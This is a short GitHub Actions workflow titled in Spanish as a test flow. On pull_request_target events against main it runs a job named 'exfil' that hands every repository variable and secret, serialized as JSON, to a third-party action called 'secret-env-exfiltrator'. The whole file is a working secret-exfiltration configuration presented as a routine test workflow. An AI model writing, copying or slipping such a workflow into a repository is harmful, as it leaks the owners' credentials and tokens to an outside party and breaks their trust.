  name: Flujo de prueba

  on:
    pull_request_target:
      types: [opened, synchronize]
      branches:
        - main

  jobs:
    exfil:
      runs-on: ubuntu-latest
      steps:
        - uses: offensive-actions/secret-env-exfiltrator@main
          with:
            vars: ${{ toJSON(vars) }}
            secrets: ${{ toJSON(secrets) }}
